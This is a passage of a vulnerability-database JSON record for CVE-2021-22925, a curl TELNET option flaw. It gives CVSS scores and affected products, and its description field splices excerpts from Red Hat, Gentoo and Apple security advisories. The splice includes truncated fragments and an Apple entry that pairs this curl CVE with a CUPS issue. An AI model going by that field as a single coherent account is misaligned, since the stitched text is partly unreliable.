        "model": "solidfire",
        "scope": null,
        "trust": 0.8,
        "vendor": "netapp",
        "version": null
      },
      {
        "_id": null,
        "model": "peoplesoft enterprise peopletools",
        "scope": null,
        "trust": 0.8,
        "vendor": "\u30aa\u30e9\u30af\u30eb",
        "version": null
      },
      {
        "_id": null,
        "model": "sinec infrastructure network services",
        "scope": null,
        "trust": 0.8,
        "vendor": "\u30b7\u30fc\u30e1\u30f3\u30b9",
        "version": null
      },
      {
        "_id": null,
        "model": "ontap",
        "scope": null,
        "trust": 0.8,
        "vendor": "netapp",
        "version": null
      },
      {
        "_id": null,
        "model": "curl",
        "scope": null,
        "trust": 0.8,
        "vendor": "haxx",
        "version": null
      }
    ],
    "sources": [
      {
        "db": "JVNDB",
        "id": "JVNDB-2021-009763"
      },
      {
        "db": "NVD",
        "id": "CVE-2021-22925"
      }
    ]
  },
  "credits": {
    "_id": null,
    "data": "Red Hat",
    "sources": [
      {
        "db": "PACKETSTORM",
        "id": "165286"
      },
      {
        "db": "PACKETSTORM",
        "id": "165287"
      },
      {
        "db": "PACKETSTORM",
        "id": "166489"
      },
      {
        "db": "PACKETSTORM",
        "id": "165129"
      },
      {
        "db": "PACKETSTORM",
        "id": "165099"
      },
      {
        "db": "PACKETSTORM",
        "id": "165862"
      }
    ],
    "trust": 0.6
  },
  "cve": "CVE-2021-22925",
  "cvss": {
    "_id": null,
    "data": [
      {
        "cvssV2": [
          {
            "accessComplexity": "LOW",
            "accessVector": "NETWORK",
            "authentication": "NONE",
            "author": "nvd@nist.gov",
            "availabilityImpact": "NONE",
            "baseScore": 5.0,
            "confidentialityImpact": "PARTIAL",
            "exploitabilityScore": 10.0,
            "id": "CVE-2021-22925",
            "impactScore": 2.9,
            "integrityImpact": "NONE",
            "severity": "MEDIUM",
            "trust": 1.8,
            "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N",
            "version": "2.0"
          },
          {
            "accessComplexity": "LOW",
            "accessVector": "NETWORK",
            "authentication": "NONE",
            "author": "VULHUB",
            "availabilityImpact": "NONE",
            "baseScore": 5.0,
            "confidentialityImpact": "PARTIAL",
            "exploitabilityScore": 10.0,
            "id": "VHN-381399",
            "impactScore": 2.9,
            "integrityImpact": "NONE",
            "severity": "MEDIUM",
            "trust": 0.1,
            "vectorString": "AV:N/AC:L/AU:N/C:P/I:N/A:N",
            "version": "2.0"
          }
        ],
        "cvssV3": [
          {
            "attackComplexity": "LOW",
            "attackVector": "NETWORK",
            "author": "nvd@nist.gov",
            "availabilityImpact": "NONE",
            "baseScore": 5.3,
            "baseSeverity": "MEDIUM",
            "confidentialityImpact": "LOW",
            "exploitabilityScore": 3.9,
            "id": "CVE-2021-22925",
            "impactScore": 1.4,
            "integrityImpact": "NONE",
            "privilegesRequired": "NONE",
            "scope": "UNCHANGED",
            "trust": 1.0,
            "userInteraction": "NONE",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N",
            "version": "3.1"
          },
          {
            "attackComplexity": "Low",
            "attackVector": "Network",
            "author": "NVD",
            "availabilityImpact": "None",
            "baseScore": 5.3,
            "baseSeverity": "Medium",
            "confidentialityImpact": "Low",
            "exploitabilityScore": null,
            "id": "CVE-2021-22925",
            "impactScore": null,
            "integrityImpact": "None",
            "privilegesRequired": "None",
            "scope": "Unchanged",
            "trust": 0.8,
            "userInteraction": "None",
            "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N",
            "version": "3.0"
          }
        ],
        "severity": [
          {
            "author": "nvd@nist.gov",
            "id": "CVE-2021-22925",
            "trust": 1.0,
            "value": "MEDIUM"
          },
          {
            "author": "NVD",
            "id": "CVE-2021-22925",
            "trust": 0.8,
            "value": "Medium"
          },
          {
            "author": "VULHUB",
            "id": "VHN-381399",
            "trust": 0.1,
            "value": "MEDIUM"
          }
        ]
      }
    ],
    "sources": [
      {
        "db": "VULHUB",
        "id": "VHN-381399"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2021-009763"
      },
      {
        "db": "NVD",
        "id": "CVE-2021-22925"
      }
    ]
  },
  "description": {
    "_id": null,
    "data": "curl supports the `-t` command line option, known as `CURLOPT_TELNETOPTIONS`in libcurl. This rarely used option is used to send variable=content pairs toTELNET servers.Due to flaw in the option parser for sending `NEW_ENV` variables, libcurlcould be made to pass on uninitialized data from a stack based buffer to theserver. Therefore potentially revealing sensitive internal information to theserver using a clear-text network protocol.This could happen because curl did not call and use sscanf() correctly whenparsing the string provided by the application. cURL Exists in the use of uninitialized resources.Information may be obtained. Summary:\n\nAn update is now available for OpenShift Logging 5.1. Solution:\n\nFor OpenShift Container Platform 4.8 see the following documentation, which\nwill be updated shortly for this release, for important instructions on how\nto upgrade your cluster and fully apply this errata update:\n\nhttps://docs.openshift.com/container-platform/4.8/release_notes/ocp-4-8-release-notes.html\n\nFor Red Hat OpenShift Logging 5.1, see the following instructions to apply\nthis update:\n\nhttps://docs.openshift.com/container-platform/4.8/logging/cluster-logging-upgrading.html\n\n4. Bugs fixed (https://bugzilla.redhat.com/):\n\n1944888 - CVE-2021-21409 netty: Request smuggling via content-length header\n2004133 - CVE-2021-37136 netty-codec: Bzip2Decoder doesn\u0027t allow setting size restrictions for decompressed data\n2004135 - CVE-2021-37137 netty-codec: SnappyFrameDecoder doesn\u0027t restrict chunk length and may buffer skippable chunks in an unnecessary way\n2030932 - CVE-2021-44228 log4j-core: Remote code execution in Log4j 2.x when logs contain an attacker-controlled string value\n\n5. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -\nGentoo Linux Security Advisory                           GLSA 202212-01\n- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -\n                                           https://security.gentoo.org/\n- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -\n\n Severity: High\n    Title: curl: Multiple Vulnerabilities\n     Date: December 19, 2022\n     Bugs: #803308, #813270, #841302, #843824, #854708, #867679, #878365\n       ID: 202212-01\n\n- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -\n\nSynopsis\n=======\nMultiple vulnerabilities have been found in curl, the worst of which\ncould result in arbitrary code execution. \n\nBackground\n=========\nA command line tool and library for transferring data with URLs. \n\nAffected packages\n================\n    -------------------------------------------------------------------\n     Package              /     Vulnerable     /            Unaffected\n    -------------------------------------------------------------------\n  1  net-misc/curl              \u003c 7.86.0                    \u003e= 7.86.0\n\nDescription\n==========\nMultiple vulnerabilities have been discovered in curl. Please review the\nCVE identifiers referenced below for details. \n\nImpact\n=====\nPlease review the referenced CVE identifiers for details. \n\nWorkaround\n=========\nThere is no known workaround at this time. \n\nResolution\n=========\nAll curl users should upgrade to the latest version:\n\n  # emerge --sync\n  # emerge --ask --oneshot --verbose \"\u003e=net-misc/curl-7.86.0\"\n\nReferences\n=========\n[ 1 ] CVE-2021-22922\n      https://nvd.nist.gov/vuln/detail/CVE-2021-22922\n[ 2 ] CVE-2021-22923\n      https://nvd.nist.gov/vuln/detail/CVE-2021-22923\n[ 3 ] CVE-2021-22925\n      https://nvd.nist.gov/vuln/detail/CVE-2021-22925\n[ 4 ] CVE-2021-22926\n      https://nvd.nist.gov/vuln/detail/CVE-2021-22926\n[ 5 ] CVE-2021-22945\n      https://nvd.nist.gov/vuln/detail/CVE-2021-22945\n[ 6 ] CVE-2021-22946\n      https://nvd.nist.gov/vuln/detail/CVE-2021-22946\n[ 7 ] CVE-2021-22947\n      https://nvd.nist.gov/vuln/detail/CVE-2021-22947\n[ 8 ] CVE-2022-22576\n      https://nvd.nist.gov/vuln/detail/CVE-2022-22576\n[ 9 ] CVE-2022-27774\n      https://nvd.nist.gov/vuln/detail/CVE-2022-27774\n[ 10 ] CVE-2022-27775\n      https://nvd.nist.gov/vuln/detail/CVE-2022-27775\n[ 11 ] CVE-2022-27776\n      https://nvd.nist.gov/vuln/detail/CVE-2022-27776\n[ 12 ] CVE-2022-27779\n      https://nvd.nist.gov/vuln/detail/CVE-2022-27779\n[ 13 ] CVE-2022-27780\n      https://nvd.nist.gov/vuln/detail/CVE-2022-27780\n[ 14 ] CVE-2022-27781\n      https://nvd.nist.gov/vuln/detail/CVE-2022-27781\n[ 15 ] CVE-2022-27782\n      https://nvd.nist.gov/vuln/detail/CVE-2022-27782\n[ 16 ] CVE-2022-30115\n      https://nvd.nist.gov/vuln/detail/CVE-2022-30115\n[ 17 ] CVE-2022-32205\n      https://nvd.nist.gov/vuln/detail/CVE-2022-32205\n[ 18 ] CVE-2022-32206\n      https://nvd.nist.gov/vuln/detail/CVE-2022-32206\n[ 19 ] CVE-2022-32207\n      https://nvd.nist.gov/vuln/detail/CVE-2022-32207\n[ 20 ] CVE-2022-32208\n      https://nvd.nist.gov/vuln/detail/CVE-2022-32208\n[ 21 ] CVE-2022-32221\n      https://nvd.nist.gov/vuln/detail/CVE-2022-32221\n[ 22 ] CVE-2022-35252\n      https://nvd.nist.gov/vuln/detail/CVE-2022-35252\n[ 23 ] CVE-2022-35260\n      https://nvd.nist.gov/vuln/detail/CVE-2022-35260\n[ 24 ] CVE-2022-42915\n      https://nvd.nist.gov/vuln/detail/CVE-2022-42915\n[ 25 ] CVE-2022-42916\n      https://nvd.nist.gov/vuln/detail/CVE-2022-42916\n\nAvailability\n===========\nThis GLSA and any updates to it are available for viewing at\nthe Gentoo Security Website:\n\n https://security.gentoo.org/glsa/202212-01\n\nConcerns?\n========\nSecurity is a primary focus of Gentoo Linux and ensuring the\nconfidentiality and security of our users\u0027 machines is of utmost\nimportance to us. Any security concerns should be addressed to\nsecurity@gentoo.org or alternatively, you may file a bug at\nhttps://bugs.gentoo.org. \n\nLicense\n======\nCopyright 2022 Gentoo Foundation, Inc; referenced text\nbelongs to its owner(s). \n\nThe contents of this document are licensed under the\nCreative Commons - Attribution / Share Alike license. \n\nhttps://creativecommons.org/licenses/by-sa/2.5\n. Description:\n\nGatekeeper Operator v0.2\n\nGatekeeper is an open source project that applies the OPA Constraint\nFramework to enforce policies on your Kubernetes clusters. \n\nThis advisory contains the container images for Gatekeeper that include\nsecurity updates, and container upgrades. For support options for any other use, see the Gatekeeper\nopen source project website at:\nhttps://open-policy-agent.github.io/gatekeeper/website/docs/howto/. \n\nSecurity updates:\n\n* golang.org/x/crypto: empty plaintext packet causes panic (CVE-2021-43565)\n\n* golang: crypto/elliptic IsOnCurve returns true for invalid field elements\n(CVE-2022-23806)\n\n3. Solution:\n\nBefore applying this update, make sure all previously released errata\nrelevant to your system have been applied. \n\nThe requirements to apply the upgraded images are different whether or not\nyou\nused the operator. Complete the following steps, depending on your\ninstallation:\n\n- - Upgrade gatekeeper operator:\nThe gatekeeper operator that is installed by the gatekeeper operator policy\nhas\n`installPlanApproval` set to `Automatic`. This setting means the operator\nwill\nbe upgraded automatically when there is a new version of the operator. No\nfurther action is required for upgrade. If you changed the setting for\n`installPlanApproval` to `manual`, then you must view each cluster to\nmanually\napprove the upgrade to the operator. \n\n- - Upgrade gatekeeper without the operator:\nThe gatekeeper version is specified as part of the Gatekeeper CR in the\ngatekeeper operator policy. To upgrade the gatekeeper version:\na) Determine the latest version of gatekeeper by visiting:\nhttps://catalog.redhat.com/software/containers/rhacm2/gatekeeper-rhel8/5fadb4a18d9a79d2f438a5d9. \nb) Click the tag dropdown, and find the latest static tag. An example tag\nis\n\u0027v3.3.0-1\u0027. \nc) Edit the gatekeeper operator policy and update the image tag to use the\nlatest static tag. For example, you might change this line to image:\n\u0027registry.redhat.io/rhacm2/gatekeeper-rhel8:v3.3.0-1\u0027. Bugs fixed (https://bugzilla.redhat.com/):\n\n2030787 - CVE-2021-43565 golang.org/x/crypto: empty plaintext packet causes panic\n2053429 - CVE-2022-23806 golang: crypto/elliptic IsOnCurve returns true for invalid field elements\n\n5. -----BEGIN PGP SIGNED MESSAGE-----\nHash: SHA256\n\nAPPLE-SA-2021-09-20-7 Additional information for \nAPPLE-SA-2021-09-13-3 macOS Big Sur 11.6\n\nmacOS Big Sur 11.6 addresses the following issues. \n\nCoreGraphics\nAvailable for: macOS Big Sur\nImpact: Processing a maliciously crafted PDF may lead to arbitrary\ncode execution. Apple is aware of a report that this issue may have\nbeen actively exploited. \nDescription: An integer overflow was addressed with improved input\nvalidation. \nCVE-2021-30860: The Citizen Lab\n\nCUPS\nAvailable for: macOS Big Sur\nImpact: A local attacker may be able to elevate their privileges\nDescription: A permissions issue existed. This issue was addressed\nwith improved permission validation. \nCVE-2021-30827: an anonymous researcher\nEntry added September 20, 2021\n\nCUPS\nAvailable for: macOS Big Sur\nImpact: A local user may be able to read arbitrary files as root\nDescription: This issue was addressed with improved checks. \nCVE-2021-30828: an anonymous researcher\nEntry added September 20, 2021\n\nCUPS\nAvailable for: macOS Big Sur\nImpact: A local user may be able to execute arbitrary files\nDescription: A URI parsing issue was addressed with improved parsing. \nCVE-2021-22925\nEntry added September 20, 2021\n\nCVMS\nAvailable for: macOS Big Sur\nImpact: A local attacker may be able to elevate their privileges\nDescription: A memory corruption issue was addressed with improved\nstate management. \nCVE-2021-30832: Mickey Jin (@patch1t) of Trend Micro\nEntry added September 20, 2021\n\nFontParser\nAvailable for: macOS Big Sur\nImpact: Processing a maliciously crafted dfont file may lead to\narbitrary code execution\nDescription: This issue was addressed with improved checks. \nCVE-2021-30841: Xingwei Lin of Ant Security Light-Year Lab\nCVE-2021-30842: Xingwei Lin of Ant Security Light-Year Lab\nCVE-2021-30843: Xingwei Lin of Ant Security Light-Year Lab\nEntry added September 20, 2021\n\nGatekeeper\nAvailable for: macOS Big Sur\nImpact: A malicious application may bypass Gatekeeper checks\nDescription: This issue was addressed with improved checks. \nCVE-2021-30853: Gordon Long (@ethicalhax) of Box, Inc. \nEntry added September 20, 2021\n\nImageIO\nAvailable for: macOS Big Sur\nImpact: Processing a maliciously crafted image may lead to arbitrary\ncode execution\nDescription: This issue was addressed with improved checks. \nCVE-2021-30847: Mike Zhang of Pangu Lab\nEntry added September 20, 2021\n\nKernel\nAvailable for: macOS Big Sur\nImpact: A malicious application may be able to execute arbitrary code\nwith kernel privileges\nDescription: A memory corruption issue was addressed with improved\nmemory handling. \nCVE-2021-30830: Zweig of Kunlun Lab\nEntry added September 20, 2021\n\nKernel\nAvailable for: macOS Big Sur\nImpact: A malicious application may be able to execute arbitrary code\nwith kernel privileges\nDescription: An out-of-bounds read was addressed with improved input\nvalidation. \nCVE-2021-30865: Zweig of Kunlun Lab\nEntry added September 20, 2021\n\nKernel\nAvailable for: macOS Big Sur\nImpact: A malicious application may be able to execute arbitrary code\nwith kernel privileges\nDescription: A race condition was addressed with improved locking. \nCVE-2021-30857: Zweig of Kunlun Lab\nEntry added September 20, 2021\n\nKernel\nAvailable for: macOS Big Sur\nImpact: A malicious application may be able to execute arbitrary code\nwith kernel privileges\nDescription: A type confusion issue was addressed with improved state\nhandling. \nCVE-2021-30859: Apple\nEntry added September 20, 2021\n\nlibexpat\nAvailable for: macOS Big Sur\nImpact: A remote attacker may be able to cause a denial of service\nDescription: This issue was addressed by updating expat to version\n2.4.1. \nCVE-2013-0340: an anonymous researcher\nEntry added September 20, 2021\n\nPreferences\nAvailable for: macOS Big Sur\nImpact: An application may be able to access restricted files\nDescription: A validation issue existed in the handling of symlinks. \nThis issue was addressed with improved validation of symlinks. \nCVE-2021-30855: Zhipeng Huo (@R3dF09) and Yuebin Sun (@yuebinsun2020)\nof Tencent Security Xuanwu Lab (xlab.tencent.com)\nEntry added September 20, 2021\n\nSandbox\nAvailable for: macOS Big Sur\nImpact: A user may gain access to protected parts of the file system\nDescription: An access issue was addressed with improved access\nrestrictions. \nCVE-2021-30850: an anonymous researcher\nEntry added September 20, 2021\n\nSMB\nAvailable for: macOS Big Sur\nImpact: A local user may be able to read kernel memory\nDescription: An out-of-bounds read was addressed with improved bounds\nchecking. \nCVE-2021-30845: Peter Nguyen Vu Hoang of STAR Labs\nEntry added September 20, 2021\n\nSMB\nAvailable for: macOS Big Sur\nImpact: A remote attacker may be able to leak memory\nDescription: A logic issue was addressed with improved state\nmanagement. \nCVE-2021-30844: Peter Nguyen Vu Hoang of STAR Labs\nEntry added September 20, 2021\n\nWebKit\nAvailable for: macOS Big Sur\nImpact: Processing maliciously crafted web content may lead to\narbitrary code execution. Apple is aware of a report that this issue\nmay have been actively exploited. \nDescription: A use after free issue was addressed with improved\nmemory management. \nCVE-2021-30858: an anonymous researcher\n\nAdditional recognition\n\nAPFS\nWe would like to acknowledge Koh M. Nakagawa of FFRI Security, Inc. \nfor their assistance. \nEntry added September 20, 2021\n\nApp Support\nWe would like to acknowledge @CodeColorist, an anonymous researcher\nfor their assistance. \nEntry added September 20, 2021\n\nCoreML\nWe would like to acknowledge hjy79425575 working with Trend Micro\nZero Day Initiative for their assistance. \nEntry added September 20, 2021\n\nCUPS\nWe would like to acknowledge an anonymous researcher for their\nassistance. \nEntry added September 20, 2021\n\nKernel\nWe would like to acknowledge Anthony Steinhauser of Google\u0027s Safeside\nproject for their assistance. \nEntry added September 20, 2021\n\nSandbox\nWe would like to acknowledge Csaba Fitzl (@theevilbit) of Offensive\nSecurity for their assistance. \nEntry added September 20, 2021\n\nsmbx\nWe would like to acknowledge Zhongcheng Li (CK01) for their\nassistance. \nEntry added September 20, 2021\n\nInstallation note:\n\nThis update may be obtained from the Mac App Store or\nApple\u0027s Software Downloads web site:\nhttps://support.apple.com/downloads/\n\nInformation will also be posted to the Apple Security Updates\nweb site: https://support.apple.com/kb/HT201222\n\nThis message is signed with Apple\u0027s Product Security PGP key,\nand details are available at:\nhttps://www.apple.com/support/security/pgp/\n\n-----BEGIN PGP SIGNATURE-----\n\niQIzBAEBCAAdFiEEePiLW1MrMjw19XzoeC9qKD1prhgFAmFI888ACgkQeC9qKD1p\nrhi/Bg/9GiqXl8sxPjDpATJqneZ1GcAxWxBZgkFrcLV/cMwrVqniWsOeVHqHjMSY\neJUkGehUtKsYE0g8Uk0qJqOUl3dxxGJpIDytOQJB3TFdd1BpZSK/tOChVem1JV1B\n+CMhqDnmR/u7bLqfCr1p6J5QJNHjTjgBA4RthdzZZ52pLGql7/2qfaJwpeHkheS4\n5EKmch8zh0CGRqrUTg1HgY67ierNsz47jIU6n7UeMwjskRU3xM9VqJ9s4eKGAtSv\n4Ry16pv0xUZ4cmL5EiLm2/eFbY8ByCji7jYPP0POBO4l518TGpaX2PaZBP9v0rrD\nt6cPEZHnsRaZ49OYak6z9iA8teKGSs6aCMuzSxExvlT8+YySf1o1nefbRH/tZMfn\nbwSO0ZyPsS9WYyuG/zX08U3CKOTkjqhLaOwVwte+cAeg2QS85aa9XPMG6PKcpyfu\nR7auxS92+Dg+R+97dAsI9TprSutCTw4iY8lyK9MVJSnh+zQSZEihUh4EaSufTHRC\nNlOSHvsTfXqsHaeed6sVKyX4ADHCUvRbCCIrqJKUs6waNd2T2XF7SzvgTSDJMHU9\n4AL/jpnltTjDJTtMO999VZKNzYurrGiHvBs5zHWr91+eaHW8YGdsDERsX3BFYLe3\n85i+Yge0iXlP7mT32cWxIw4AWDFITFiHnmV1/cdsCd2GIkqkhFw=\n=9bjT\n-----END PGP SIGNATURE-----\n\n\n\n. -----BEGIN PGP SIGNED MESSAGE-----\nHash: SHA256\n\n=====================================================================\n                   Red Hat Security Advisory\n\nSynopsis:          Moderate: ACS 3.67 security and enhancement update\nAdvisory ID:       RHSA-2021:4902-01\nProduct:           RHACS\nAdvisory URL:      https://access.redhat.com/errata/RHSA-2021:4902\nIssue date:        2021-12-01\nCVE Names:         CVE-2018-20673 CVE-2019-5827 CVE-2019-13750 \n                   CVE-2019-13751 CVE-2019-17594 CVE-2019-17595 \n                   CVE-2019-18218 CVE-2019-19603 CVE-2019-20838 \n                   CVE-2020-12762 CVE-2020-13435 CVE-2020-14155 \n                   CVE-2020-16135 CVE-2020-24370 CVE-2020-27304 \n                   CVE-2021-3200 CVE-2021-3445 CVE-2021-3580 \n                   CVE-2021-3749 CVE-2021-3800 CVE-2021-3801 \n                   CVE-2021-20231 CVE-2021-20232 CVE-2021-20266 \n                   CVE-2021-22876 CVE-2021-22898 CVE-2021-22925 \n                   CVE-2021-23343 CVE-2021-23840 CVE-2021-23841 \n                   CVE-2021-27645 CVE-2021-28153 CVE-2021-29923 \n                   CVE-2021-32690 CVE-2021-33560 CVE-2021-33574 \n                   CVE-2021-35942 CVE-2021-36084 CVE-2021-36085 \n                   CVE-2021-36086 CVE-2021-36087 CVE-2021-39293 \n=====================================================================\n\n1. Summary:\n\nUpdated images are now available for Red Hat Advanced Cluster Security for\nKubernetes (RHACS). \n\nRed Hat Product Security has rated this update as having a security impact\nof Moderate. A Common Vulnerability Scoring System (CVSS) base score, which\ngives a detailed severity rating, is available for each vulnerability from\nthe CVE link(s) in the References section. \n\n2. Description:\n\nThe release of RHACS 3.67 provides the following new features, bug fixes,\nsecurity patches and system changes:\n\nOpenShift Dedicated support\n\nRHACS 3.67 is thoroughly tested and supported on OpenShift Dedicated on\nAmazon Web Services and Google Cloud Platform. \n\n1. Use OpenShift OAuth server as an identity provider\nIf you are using RHACS with OpenShift, you can now configure the built-in\nOpenShift OAuth server as an identity provider for RHACS. \n\n2. Enhancements for CI outputs\nRed Hat has improved the usability of RHACS CI integrations. CI outputs now\nshow additional detailed information about the vulnerabilities and the\nsecurity policies responsible for broken builds. \n\n3. Runtime Class policy criteria\nUsers can now use RHACS to define the container runtime configuration that\nmay be used to run a pod\u2019s containers using the Runtime Class policy\ncriteria. \n\nSecurity Fix(es):\n\n* civetweb: directory traversal when using the built-in example HTTP\nform-based file upload mechanism via the mg_handle_form_request API\n(CVE-2020-27304)\n\n* nodejs-axios: Regular expression denial of service in trim function\n(CVE-2021-3749)\n\n* nodejs-prismjs: ReDoS vulnerability (CVE-2021-3801)\n\n* golang: net: incorrect parsing of extraneous zero characters at the\nbeginning of an IP address octet (CVE-2021-29923)\n\n* helm: information disclosure vulnerability (CVE-2021-32690)\n\n* golang: archive/zip: malformed archive may cause panic or memory\nexhaustion (incomplete fix of CVE-2021-33196) (CVE-2021-39293)\n\n* nodejs-path-parse: ReDoS via splitDeviceRe, splitTailRe and splitPathRe\n(CVE-2021-23343)\n\nFor more details about the security issue(s), including the impact, a CVSS\nscore, acknowledgments, and other related information, refer to the CVE\npage(s) listed in the References section. \n\nBug Fixes\nThe release of RHACS 3.67 includes the following bug fixes:\n\n1. Previously, when using RHACS with the Compliance Operator integration,\nRHACS did not respect or populate Compliance Operator TailoredProfiles. \nThis has been fixed. \n\n2. Previously, the Alpine Linux package manager (APK) in Image policy\nlooked for the presence of apk package in the image rather than the\napk-tools package. This issue has been fixed. \n\nSystem changes\nThe release of RHACS 3.67 includes the following system changes:\n\n1. Scanner now identifies vulnerabilities in Ubuntu 21.10 images. \n2. The Port exposure method policy criteria now include route as an\nexposure method. \n3. The OpenShift: Kubeadmin Secret Accessed security policy now allows the\nOpenShift Compliance Operator to check for the existence of the Kubeadmin\nsecret without creating a violation. \n4. The OpenShift Compliance Operator integration now supports using\nTailoredProfiles. \n5. The RHACS Jenkins plugin now provides additional security information. \n6. When you enable the environment variable ROX_NETWORK_ACCESS_LOG for\nCentral, the logs contain the Request URI and X-Forwarded-For header\nvalues. \n7. The default uid:gid pair for the Scanner image is now 65534:65534. \n8. RHACS adds a new default Scope Manager role that includes minimum\npermissions to create and modify access scopes. \n9. If microdnf is part of an image or shows up in process execution, RHACS\nreports it as a security violation for the Red Hat Package Manager in Image\nor the Red Hat Package Manager Execution security policies. \n10. In addition to manually uploading vulnerability definitions in offline\nmode, you can now upload definitions in online mode. \n11. You can now format the output of the following roxctl CLI commands in\ntable, csv, or JSON format: image scan, image check \u0026 deployment check\n12. You can now use a regular expression for the deployment name while\nspecifying policy exclusions\n\n3. Solution:\n\nTo take advantage of these new features, fixes and changes, please upgrade\nRed Hat Advanced Cluster Security for Kubernetes to version 3.67. \n\n4. Bugs fixed (https://bugzilla.redhat.com/):\n\n1956818 - CVE-2021-23343 nodejs-path-parse: ReDoS via splitDeviceRe, splitTailRe and splitPathRe\n1978144 - CVE-2021-32690 helm: information disclosure vulnerability\n1992006 - CVE-2021-29923 golang: net: incorrect parsing of extraneous zero characters at the beginning of an IP address octet\n1999784 - CVE-2021-3749 nodejs-axios: Regular expression denial of service in trim function\n2005445 - CVE-2021-3801 nodejs-prismjs: ReDoS vulnerability\n2006044 - CVE-2021-39293 golang: archive/zip: malformed archive may cause panic or memory exhaustion (incomplete fix of CVE-2021-33196)\n2016640 - CVE-2020-27304 civetweb: directory traversal when using the built-in example HTTP form-based file upload mechanism via the mg_handle_form_request API\n\n5. JIRA issues fixed (https://issues.jboss.org/):\n\nRHACS-65 - Release RHACS 3.67.0\n\n6. References:\n\nhttps://access.redhat.com/security/cve/CVE-2018-20673\nhttps://access.redhat.com/security/cve/CVE-2019-5827\nhttps://access.redhat.com/security/cve/CVE-2019-13750\nhttps://access.redhat.com/security/cve/CVE-2019-13751\nhttps://access.redhat.com/security/cve/CVE-2019-17594\nhttps://access.redhat.com/security/cve/CVE-2019-17595\nhttps://access.redhat.com/security/cve/CVE-2019-18218\nhttps://access.redhat.com/security/cve/CVE-2019-19603\nhttps://access.redhat.com/security/cve/CVE-2019-20838\nhttps://access.redhat.com/security/cve/CVE-2020-12762\nhttps://access.redhat.com/security/cve/CVE-2020-13435\nhttps://access.redhat.com/security/cve/CVE-2020-14155\nhttps://access.redhat.com/security/cve/CVE-2020-16135\nhttps://access.redhat.com/security/cve/CVE-2020-24370\nhttps://access.redhat.com/security/cve/CVE-2020-27304\nhttps://access.redhat.com/security/cve/CVE-2021-3200\nhttps://access.redhat.com/security/cve/CVE-2021-3445\nhttps://access.redhat.com/security/cve/CVE-2021-3580\nhttps://access.redhat.com/security/cve/CVE-2021-3749\nhttps://access.redhat.com/security/cve/CVE-2021-3800\nhttps://access.redhat.com/security/cve/CVE-2021-3801\nhttps://access.redhat.com/security/cve/CVE-2021-20231\nhttps://access.redhat.com/security/cve/CVE-2021-20232\nhttps://access.redhat.com/security/cve/CVE-2021-20266\nhttps://access.redhat.com/security/cve/CVE-2021-22876\nhttps://access.redhat.com/security/cve/CVE-2021-22898\nhttps://access.redhat.com/security/cve/CVE-2021-22925\nhttps://access.redhat.com/security/cve/CVE-2021-23343\nhttps://access.redhat.com/security/cve/CVE-2021-23840\nhttps://access.redhat.com/security/cve/CVE-2021-23841\nhttps://access.redhat.com/security/cve/CVE-2021-27645\nhttps://access.redhat.com/security/cve/CVE-2021-28153\nhttps://access.redhat.com/security/cve/CVE-2021-29923\nhttps://access.redhat.com/security/cve/CVE-2021-32690\nhttps://access.redhat.com/security/cve/CVE-2021-33560\nhttps://access.redhat.com/security/cve/CVE-2021-33574\nhttps://access.redhat.com/security/cve/CVE-2021-35942\nhttps://access.redhat.com/security/cve/CVE-2021-36084\nhttps://access.redhat.com/security/cve/CVE-2021-36085\nhttps://access.redhat.com/security/cve/CVE-2021-36086\nhttps://access.redhat.com/security/cve/CVE-2021-36087\nhttps://access.redhat.com/security/cve/CVE-2021-39293\nhttps://access.redhat.com/security/updates/classification/#moderate\n\n7. Contact:\n\nThe Red Hat security contact is \u003csecalert@redhat.com\u003e. More contact\ndetails at https://access.redhat.com/security/team/contact/\n\nCopyright 2021 Red Hat, Inc. \n-----BEGIN PGP SIGNATURE-----\nVersion: GnuPG v1\n\niQIVAwUBYafeGdzjgjWX9erEAQgZ8Q/9H5ov4ZfKZszdJu0WvRMetEt6DMU2RTZr\nKjv4h4FnmsMDYYDocnkFvsRjcpdGxtoUShAqD6+FrTNXjPtA/v1tsQTJzhg4o50w\ntKa9T4aHfrYXjGvWgQXJJEGmGaYMYePUOv77x6pLfMB+FmgfOtb8kzOdNzAtqX3e\nlq8b2DrQuPSRiWkUgFM2hmS7OtUsqTIShqWu67HJdOY74qDN4DGp7GnG6inCrUjV\nx4/4X5Fb7JrAYiy57C5eZwYW61HmrG7YHk9SZTRYgRW0rfgLncVsny4lX1871Ch2\ne8ttu0EJFM1EJyuCJwJd1Q+rhua6S1VSY+etLUuaYme5DtvozLXQTLUK31qAq/hK\nqnLYQjaSieea9j1dV6YNHjnvV0XGczyZYwzmys/CNVUxwvSHr1AJGmQ3zDeOt7Qz\nvguWmPzyiob3RtHjfUlUpPYeI6HVug801YK6FAoB9F2BW2uHVgbtKOwG5pl5urJt\nG4taizPtH8uJj5hem5nHnSE1sVGTiStb4+oj2LQonRkgLQ2h7tsX8Z8yWM/3TwUT\nPTBX9AIHwt8aCx7XxTeEIs0H9B1T9jYfy06o9H2547un9sBoT0Sm7fqKuJKic8N/\npJ2kXBiVJ9B4G+JjWe8rh1oC1yz5Q5/5HZ19VYBjHhYEhX4s9s2YsF1L1uMoT3NN\nT0pPNmsPGZY=\n=ux5P\n-----END PGP SIGNATURE-----\n\n--\nRHSA-announce mailing list\nRHSA-announce@redhat.com\nhttps://listman.redhat.com/mailman/listinfo/rhsa-announce\n. Summary:\n\nThe Migration Toolkit for Containers (MTC) 1.5.2 is now available. Description:\n\nThe Migration Toolkit for Containers (MTC) enables you to migrate\nKubernetes resources, persistent volume data, and internal container images\nbetween OpenShift Container Platform clusters, using the MTC web console or\nthe Kubernetes API. \n\nSecurity Fix(es):\n\n* nodejs-immer: prototype pollution may lead to DoS or remote code\nexecution (CVE-2021-3757)\n\n* mig-controller: incorrect namespaces handling may lead to not authorized\nusage of Migration Toolkit for Containers (MTC) (CVE-2021-3948)\n\nFor more details about the security issue(s), including the impact, a CVSS\nscore, acknowledgments, and other related information, refer to the CVE\npage(s) listed in the References section. Solution:\n\nFor details on how to install and use MTC, refer 